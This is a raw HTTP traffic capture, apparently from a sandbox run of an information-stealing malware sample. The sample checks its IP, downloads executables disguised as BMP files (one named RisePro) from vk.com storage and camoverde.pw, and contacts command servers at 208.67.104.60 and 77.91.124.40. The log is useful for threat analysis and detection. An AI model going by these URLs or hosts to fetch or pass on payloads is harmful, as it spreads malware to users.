Network Analysis

GET / HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: api.myip.com

HTTP/1.1 200 OK Date: Tue, 18 Jul 2023 00:58:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DHTzx7QSKpGWD4%2BtCWtjugRpILB0XuSi4mwtZcsS0xsq6S4ovmJm7NF9ymGL4eqkqwzpPEtE0K4K0FaBvb3u37hPgumS1gqHddgQSDRHXhFhdmnB%2BKNXXqSgbZqdVA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7e86c7709da28385-KIX

GET /doc746114504_647280747?hash=cvDFKP5q0CQEjBCbeoeHvPNrWE0xbMxZEmrkIeNKcET&dl=G42DMMJRGQ2TANA:1661413520:uZNj68vRUvQaydRD8wpAK8zluN0I7otw5AHbA1ZlN9T&api=1&no_preview=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache

HTTP/1.1 200 OK Server: kittenx Date: Tue, 18 Jul 2023 00:58:59 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 240177 Connection: keep-alive X-Powered-By: KPHP/7.4.114177 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixlang=17; expires=Sat, 20 Jul 2024 13:20:04 GMT; path=/; domain=.vk.com Set-Cookie: remixstlid=9066415190589096709_7glS0yLxHjgUVDHuM51ZNMCXd8Z91lvtzM3x4OvTXlT; expires=Wed, 17 Jul 2024 00:58:59 GMT; path=/; domain=.vk.com; secure Set-Cookie: remixstemp=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure Set-Cookie: remixlgck=74ebe3b98cf3ddf455; expires=Sun, 21 Jul 2024 15:37:46 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixstid=1927807604_CHdaewi2CJ3TqZk5GaSjFAhw6G1Vx5KRZM5DYfGuhrD; expires=Thu, 11 Jul 2024 06:23:13 GMT; path=/; domain=.vk.com; secure Cache-control: no-store X-Robots-Tag: noindex,nofollow Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://*.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://*.yandex.ru https://*.google-analytics.com https://*.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://*.google.com https://google.com https://*.vkpartner.ru https://*.moatads.com https://*.adlooxtracking.ru https://*.serving-sys.ru https://*.weborama-tech.ru https://*.gstatic.com https://*.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://*.vk-cdn.net https://*.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline';report-uri /csp X-XSS-Protection: 1; report=/xss_reports X-Frame-Options: deny X-Frontend: front605106 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /setup294.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: camoverde.pw Cache-Control: no-cache

HTTP/1.1 200 OK Date: Tue, 18 Jul 2023 00:59:03 GMT Content-Type: application/x-msdos-program Content-Length: 1718034 Connection: keep-alive Last-Modified: Mon, 17 Jul 2023 19:27:53 GMT ETag: "1a3712-600b3cb774040" Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 6242 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7r%2FjcGpl2X4KZpa7AiNMr2P1qHAZKZsZDGukdi%2BfZ6jmVRop%2BhQISI3J8WZifpoWYEIbfHKhTTanJsim1nS5Xj160sA9%2BiSwM9bw7oa4j050Kc3VpdxTbT%2F76GVt%2FTk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7e86c7a39c19834c-KIX alt-svc: h3=":443"; ma=86400

GET /doc808950829_664207170?hash=kMt7FUJyRMXd3utd25izhIrZbfZfaKJzCnFJqUmY3Sw&dl=uZ3GDnIBuaFj1FCG7xA3gziJZ6Zba8NMATPW6Lqrzb0&api=1&no_preview=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9066415190589096709_7glS0yLxHjgUVDHuM51ZNMCXd8Z91lvtzM3x4OvTXlT; remixlgck=74ebe3b98cf3ddf455; remixstid=1927807604_CHdaewi2CJ3TqZk5GaSjFAhw6G1Vx5KRZM5DYfGuhrD

HTTP/1.1 302 Found Server: kittenx Date: Tue, 18 Jul 2023 00:59:06 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.114177 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-22.userapi.com/c237331/u808950829/docs/d28/3a37ed672f4f/PMmp.bmp?extra=gcnGDZKNmUI9ILIZltV-06CxoxiUcVZM6a15nmaWisbkvGbAiySFTZuYmIuvNuKeY7WquRScXXJZm0OToeoDD2hOlbsD_3s2T0lYUV2YTBJCIid2vzPwneGNQMY8ygLXJcaHc_FtHwhbF7oRtg X-Frontend: front605106 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /c237331/u808950829/docs/d28/3a37ed672f4f/PMmp.bmp?extra=gcnGDZKNmUI9ILIZltV-06CxoxiUcVZM6a15nmaWisbkvGbAiySFTZuYmIuvNuKeY7WquRScXXJZm0OToeoDD2hOlbsD_3s2T0lYUV2YTBJCIid2vzPwneGNQMY8ygLXJcaHc_FtHwhbF7oRtg HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-22.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Tue, 18 Jul 2023 00:59:07 GMT Content-Type: image/x-ms-bmp Content-Length: 6771716 Connection: keep-alive Last-Modified: Thu, 13 Jul 2023 11:19:05 GMT ETag: "64afdda9-675404" Expires: Thu, 17 Aug 2023 00:59:07 GMT Cache-Control: max-age=2592000 X-Frontend: front6-22 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Timing-Allow-Origin: * Accept-Ranges: bytes

GET /doc808950829_663788437?hash=2eEvnU5tvv0tTTXDhEX8q9Boubn9undHCOt73KTUqzD&dl=EJ05zUitXuxdQoIcYUJ5Zj5KPM6Kzzrdpz0VhUeNkOo&api=1&no_preview=1#WW1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9066415190589096709_7glS0yLxHjgUVDHuM51ZNMCXd8Z91lvtzM3x4OvTXlT; remixlgck=74ebe3b98cf3ddf455; remixstid=1927807604_CHdaewi2CJ3TqZk5GaSjFAhw6G1Vx5KRZM5DYfGuhrD

HTTP/1.1 200 OK Server: kittenx Date: Tue, 18 Jul 2023 00:59:07 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 240119 Connection: keep-alive X-Powered-By: KPHP/7.4.114177 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixstemp=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure Cache-control: no-store X-Robots-Tag: noindex,nofollow Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://*.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://*.yandex.ru https://*.google-analytics.com https://*.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://*.google.com https://google.com https://*.vkpartner.ru https://*.moatads.com https://*.adlooxtracking.ru https://*.serving-sys.ru https://*.weborama-tech.ru https://*.gstatic.com https://*.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://*.vk-cdn.net https://*.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline';report-uri /csp X-XSS-Protection: 1; report=/xss_reports X-Frame-Options: deny X-Frontend: front605106 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /doc791620691_663065029?hash=Efubo9FQtw3Bdj42XJVcJwymfIH3PazMKz8g5wJ0dZX&dl=G44TCNRSGA3DSMI:1682787066:QgrgzF33wDt9bwmmOgWCYTv61J7HwhLVZOXGaEdWiKP&api=1&no_preview=1#stats HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9066415190589096709_7glS0yLxHjgUVDHuM51ZNMCXd8Z91lvtzM3x4OvTXlT; remixlgck=74ebe3b98cf3ddf455; remixstid=1927807604_CHdaewi2CJ3TqZk5GaSjFAhw6G1Vx5KRZM5DYfGuhrD

HTTP/1.1 200 OK Server: kittenx Date: Tue, 18 Jul 2023 00:59:10 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 240193 Connection: keep-alive X-Powered-By: KPHP/7.4.114177 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixstemp=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure Cache-control: no-store X-Robots-Tag: noindex,nofollow Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://*.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://*.yandex.ru https://*.google-analytics.com https://*.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://*.google.com https://google.com https://*.vkpartner.ru https://*.moatads.com https://*.adlooxtracking.ru https://*.serving-sys.ru https://*.weborama-tech.ru https://*.gstatic.com https://*.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://*.vk-cdn.net https://*.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline' X-XSS-Protection: 1; report=/xss_reports X-Frame-Options: deny X-Frontend: front605106 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /doc791620691_663065029?hash=Efubo9FQtw3Bdj42XJVcJwymfIH3PazMKz8g5wJ0dZX&dl=G44TCNRSGA3DSMI:1682787066:QgrgzF33wDt9bwmmOgWCYTv61J7HwhLVZOXGaEdWiKP&api=1&no_preview=1#test HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9066415190589096709_7glS0yLxHjgUVDHuM51ZNMCXd8Z91lvtzM3x4OvTXlT; remixlgck=74ebe3b98cf3ddf455; remixstid=1927807604_CHdaewi2CJ3TqZk5GaSjFAhw6G1Vx5KRZM5DYfGuhrD

HTTP/1.1 200 OK Server: kittenx Date: Tue, 18 Jul 2023 00:59:11 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 240192 Connection: keep-alive X-Powered-By: KPHP/7.4.114177 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixstemp=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure Cache-control: no-store X-Robots-Tag: noindex,nofollow Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://*.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://*.yandex.ru https://*.google-analytics.com https://*.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://*.google.com https://google.com https://*.vkpartner.ru https://*.moatads.com https://*.adlooxtracking.ru https://*.serving-sys.ru https://*.weborama-tech.ru https://*.gstatic.com https://*.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://*.vk-cdn.net https://*.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline' X-XSS-Protection: 1; report=/xss_reports X-Frame-Options: deny X-Frontend: front605106 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /doc808950829_664402789?hash=p2AcukYoSYRh3R7HrdzDlmRExK7FwDhZPzjD3FbEXb0&dl=mCy6gA7S91auE1MrYaS4hBwW7fCACazMjt4KNbkHoYX&api=1&no_preview=1#setup HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9066415190589096709_7glS0yLxHjgUVDHuM51ZNMCXd8Z91lvtzM3x4OvTXlT; remixlgck=74ebe3b98cf3ddf455; remixstid=1927807604_CHdaewi2CJ3TqZk5GaSjFAhw6G1Vx5KRZM5DYfGuhrD

HTTP/1.1 302 Found Server: kittenx Date: Tue, 18 Jul 2023 00:59:15 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.114177 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-20.userapi.com/c909628/u808950829/docs/d40/155c07867695/Setup.bmp?extra=-S2EoGHJnh2jeTB8HNKjYdnwj6Du8mGxwSQ5UwXAkSHl4SEgMe7AHfKHQSoKksDKstj1GGnkWJFmNoi9QOYZ8e9IMjZPi0WzPb6OAV9f8lILm4OGTxxjN_r7Vbv6LV2z0coNyj6nAhRG5sQHZg X-Frontend: front605106 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /doc808950829_664295976?hash=wWP2uKSW6vc2Zwh4dERWVq2558nuK0zAmie4S5babxg&dl=fnVWutUVH5EHCOnwUxAqrClRC7zCIeOyomm4pfSrZFc&api=1&no_preview=1#rise_test HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9066415190589096709_7glS0yLxHjgUVDHuM51ZNMCXd8Z91lvtzM3x4OvTXlT; remixlgck=74ebe3b98cf3ddf455; remixstid=1927807604_CHdaewi2CJ3TqZk5GaSjFAhw6G1Vx5KRZM5DYfGuhrD

HTTP/1.1 302 Found Server: kittenx Date: Tue, 18 Jul 2023 00:59:16 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.114177 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-22.userapi.com/c237031/u808950829/docs/d38/9e626a273537/RisePro_0_2_9rOsvaKa1eDf138eBlTl.bmp?extra=5LvyYRmmLl8tdr8Ya5heHfIfMdNgEKGJCbWFSF2a8RiEodeqwnr-q-HLR8RKKd2ySEMTj4qUMPDE1d5V4NAVgNgh34oW-WAd_uO8rIsPGOWjP5z8ZR7X4pJy84WcJR9vNu5NKPpGxVHYL4Wz_g X-Frontend: front605106 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /c237031/u808950829/docs/d38/9e626a273537/RisePro_0_2_9rOsvaKa1eDf138eBlTl.bmp?extra=5LvyYRmmLl8tdr8Ya5heHfIfMdNgEKGJCbWFSF2a8RiEodeqwnr-q-HLR8RKKd2ySEMTj4qUMPDE1d5V4NAVgNgh34oW-WAd_uO8rIsPGOWjP5z8ZR7X4pJy84WcJR9vNu5NKPpGxVHYL4Wz_g HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-22.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Tue, 18 Jul 2023 00:59:16 GMT Content-Type: image/x-ms-bmp Content-Length: 1024516 Connection: keep-alive Last-Modified: Sat, 15 Jul 2023 10:36:35 GMT ETag: "64b276b3-fa204" Expires: Thu, 17 Aug 2023 00:59:16 GMT Cache-Control: max-age=2592000 X-Frontend: front6-22 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Timing-Allow-Origin: * Accept-Ranges: bytes

GET /c909628/u808950829/docs/d40/155c07867695/Setup.bmp?extra=-S2EoGHJnh2jeTB8HNKjYdnwj6Du8mGxwSQ5UwXAkSHl4SEgMe7AHfKHQSoKksDKstj1GGnkWJFmNoi9QOYZ8e9IMjZPi0WzPb6OAV9f8lILm4OGTxxjN_r7Vbv6LV2z0coNyj6nAhRG5sQHZg HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-20.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Tue, 18 Jul 2023 00:59:16 GMT Content-Type: image/x-ms-bmp Content-Length: 1799372 Connection: keep-alive Last-Modified: Mon, 17 Jul 2023 19:04:08 GMT ETag: "64b590a8-1b74cc" Expires: Thu, 17 Aug 2023 00:59:16 GMT Cache-Control: max-age=2592000 X-Frontend: front6-20 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Timing-Allow-Origin: * Accept-Ranges: bytes

GET /doc808950829_664352898?hash=TpvyQqEeYsjdodWTHrXtKlZqBTWVZrPRit56oUnvQNg&dl=sD0PBsoT1zBUSEgqcJWb3g6HPzuBQ8Yjvhr8mqZxT94&api=1&no_preview=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9066415190589096709_7glS0yLxHjgUVDHuM51ZNMCXd8Z91lvtzM3x4OvTXlT; remixlgck=74ebe3b98cf3ddf455; remixstid=1927807604_CHdaewi2CJ3TqZk5GaSjFAhw6G1Vx5KRZM5DYfGuhrD

HTTP/1.1 302 Found Server: kittenx Date: Tue, 18 Jul 2023 00:59:16 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.114177 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-22.userapi.com/c909218/u808950829/docs/d53/96be74f81b36/h8d337t1s6ya.bmp?extra=iMdiTqwVj_onJ1LuJ6We14YTEDYuZM_Brr62lq1KsudjEwrtFjIQd3BREwt3fIEGp47rx_msY26ho4sjG3gY49shmqDAGw2CWv26UfCwNeR69DZ5bz3anb_z_mrjE9i5yhj71xHRwlb5AsalzQ X-Frontend: front605106 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /c909218/u808950829/docs/d53/96be74f81b36/h8d337t1s6ya.bmp?extra=iMdiTqwVj_onJ1LuJ6We14YTEDYuZM_Brr62lq1KsudjEwrtFjIQd3BREwt3fIEGp47rx_msY26ho4sjG3gY49shmqDAGw2CWv26UfCwNeR69DZ5bz3anb_z_mrjE9i5yhj71xHRwlb5AsalzQ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-22.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Tue, 18 Jul 2023 00:59:17 GMT Content-Type: image/x-ms-bmp Content-Length: 701444 Connection: keep-alive Last-Modified: Sun, 16 Jul 2023 16:59:45 GMT ETag: "64b42201-ab404" Expires: Thu, 17 Aug 2023 00:59:17 GMT Cache-Control: max-age=2592000 X-Frontend: front6-22 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Timing-Allow-Origin: * Accept-Ranges: bytes

GET /demo/home.php?s=175.208.134.152 HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Host: db-ip.com

HTTP/1.1 200 OK Date: Tue, 18 Jul 2023 00:59:50 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive X-IPLB-Request-ID: AC46E951:7B96_93878F2E:0050_64B5E406_1CDD3C6E:2467C X-IPLB-Instance: 30783 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=D%2BGPURoci2gOD%2B6QdLq4PuVcT7Squ3k%2BOA1lUmRJf8CrKoG1kpOlcaXwgrIttyrO1qU9Em%2BBDvtDcPs9eVTbHnFWghp%2FvA5VMsHs3V0RrIqTZz675KNQbuzCrw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7e86c8c47c54837f-KIX alt-svc: h3=":443"; ma=86400

GET / HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: db-ip.com

HTTP/1.1 200 OK Date: Tue, 18 Jul 2023 00:59:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Cache-control: max-age=28800 X-IPLB-Request-ID: AC4631A3:DFBE_93878F2E:0050_64B5E407_1CD8184B:2467B X-IPLB-Instance: 30783 CF-Cache-Status: MISS Last-Modified: Tue, 18 Jul 2023 00:59:51 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sYa%2FwBSw2KazZAgsoQc65mbPR2xf1PTll9U%2FOPH8bCavkT9brrmdYXOz2lXbwxY9dbMj6pOEHt8fq8ZedO03kTba%2B63IZhcw1MzvB0DFOZLONnzQ6wlng9itIA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7e86c8ccfe770ad2-KIX alt-svc: h3=":443"; ma=86400

POST /v2/p31e4d59ee6ad1a0b5cc80695a873e43a8fbca06/self HTTP/1.1 Connection: Keep-Alive Referer: https://db-ip.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 0 Host: api.db-ip.com

HTTP/1.1 200 OK Date: Tue, 18 Jul 2023 00:59:52 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Access-Control-Allow-Origin: http*://*db-ip.com Cache-control: max-age=180 X-IPLB-Request-ID: 8D655683:310C_93878F2E:0050_64B5E408_1CD30E35:2467A X-IPLB-Instance: 30783 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gGXMpbt86KNbG9hJSKAIo%2FpScnpMkrbZ5QVApwCZRyWKPZzMwe0zRb0nXn0OvDEbM1Z4ZrYlK2eolZFvAEBw6urZSaLBIaBHRyJ83AWB3cyTzhmXmWzWruRgVS6Ju0o%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7e86c8d36c7819f8-KIX alt-svc: h3=":443"; ma=86400

GET /api/tracemap.php HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 208.67.104.60

HTTP/1.1 200 OK Date: Tue, 18 Jul 2023 00:58:55 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29 X-Powered-By: PHP/7.4.29 Content-Length: 15 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 133 Host: 208.67.104.60

HTTP/1.1 200 OK Date: Tue, 18 Jul 2023 00:58:56 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29 X-Powered-By: PHP/7.4.29 Content-Length: 108 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 133 Host: 208.67.104.60

HTTP/1.1 200 OK Date: Tue, 18 Jul 2023 00:59:02 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29 X-Powered-By: PHP/7.4.29 Content-Length: 4160 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

HEAD /info/photo540.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 77.91.124.40 Content-Length: 0 Cache-Control: no-cache

